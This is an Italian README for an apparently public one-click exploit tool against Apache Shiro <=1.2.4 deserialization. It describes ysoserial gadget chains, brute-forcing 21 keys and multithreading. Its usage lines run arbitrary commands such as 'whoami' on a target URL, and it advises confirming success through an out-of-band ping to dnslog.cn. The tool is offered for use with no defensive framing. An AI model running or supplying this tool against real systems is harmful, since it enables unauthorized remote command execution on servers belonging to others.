
shiro 1.2.47 deserializzazione
Shiro<=1.2.4 deserializzazione, strumento di rilevamento con un clic
Modifiche: 1. Aggiunti 4 nuovi moduli di catene di exploit (CommonsCollections7-10), con un aumento previsto del 30% del tasso di successo. Già impacchettato nel nuovo jar di ysoserial, non sostituirlo
Modifiche: 2. Aggiunto multithreading: nonostante l'aumento dei moduli, la velocità è migliorata del 300%
Integrati 21 key per il fuzz
Se ti è utile, lascia una stella. Articolo del blog corrispondente: http://www.svenbeast.com/post/tskRKJIPg/
pip3 install -r requirments.txt
Usage: python3 shiro.py url command
Usage: python3 shiro.py https://url.com whoami
http://www.dnslog.cn/ Per la verifica si consiglia di usare questa piattaforma dnslog, è molto più veloce di ceye.io
Ricorda di racchiudere tra virgolette "" i comandi che contengono spazi
usage: python3 shiro.py http://url.com "ping dnslog.cn"
Esegue tutti gli 11 moduli, poi controlla sulla piattaforma dnslog se è stata ricevuta una richiesta. Se non esce nulla, GG: potrebbe anche essere perché gli encoding non sono ancora sufficienti
Raccogli tu stesso gli encoding: puoi aggiungere metodi nel codice sorgente sotto moule
Per semplificare l'esecuzione dello script, il numero di thread non è controllato tramite parametri dall'utente: di default sono 20 thread. Per modificarli, vai alla riga 20 del file /moule/main.py e modifica il parametro che controlla i thread